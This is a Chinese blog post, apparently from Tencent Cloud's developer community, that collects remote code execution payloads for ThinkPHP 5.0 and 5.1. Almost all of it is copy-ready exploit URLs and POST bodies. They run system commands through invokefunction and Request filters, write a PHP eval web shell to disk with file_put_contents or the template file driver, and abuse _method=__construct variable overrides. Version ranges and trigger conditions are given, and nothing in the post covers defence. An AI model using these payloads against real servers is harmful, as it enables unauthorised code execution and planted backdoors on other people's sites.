首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >ThinkPHP 5.x.x RCE 总结

ThinkPHP 5.x.x RCE 总结

作者头像
Mirror王宇阳
发布2021-06-22 22:48:26
1.4K0
发布2021-06-22 22:48:26
举报

ThinkPHP 5.x [路由控制不严谨] RCE

影响范围

ThinkPHP 5.0-5.0.23

ThinkPHP 5.1-5.1.31

Payload

?s=index/think\request/input?data[]=phpinfo()&filter=assert

# 远程代码命令执行 tp 5.0.7 ~ 5.0.23

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo \'<?php @eval($_POST[xxxxxx]);?>\'>zxc2.php'

?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=zxc1.php&vars[1][]=<?php @eval($_POST[xxxxxx]);?>


# 远程代码命令执行 tp 5.1.x

?s=index/\think\Request/input&filter=system&data=whoami

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

?=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<php%20phpinfo();> 

vars[0]的值是PHP的函数 vars[1][]的值是PHP的函数(vars[0])的参数 system(whoami)

ThinkPHP 5.0.x [变量覆盖] RCE

影响范围

ThinkPHP 5.0.x

利用条件

Payload

# tp 5.0.0 ~ 5.0.12 无条件触发(参数a可以替换成get[]/route[]等)
_method=__construct&filter=system&a=whoami&method=GET
_method=__construct&filter=system&a=whoami

# tp 5.0.13 ~ 5.0.23 有条件触发(需要有第三方库,如captcha或开启debug)
# GET index.php?s=captcha 第三方库
_method=__construct&filter=system&a=whoami
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
_method=__construct&filter[]=system&method=get&get[]=whoami ||
_method=__construct&filter=system&method=GET&route[]=whoami
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2021-06-21 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • ThinkPHP 5.x [路由控制不严谨] RCE
    • 影响范围
      • Payload
      • ThinkPHP 5.0.x [变量覆盖] RCE
        • 影响范围
          • 利用条件
            • Payload
            领券
            问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档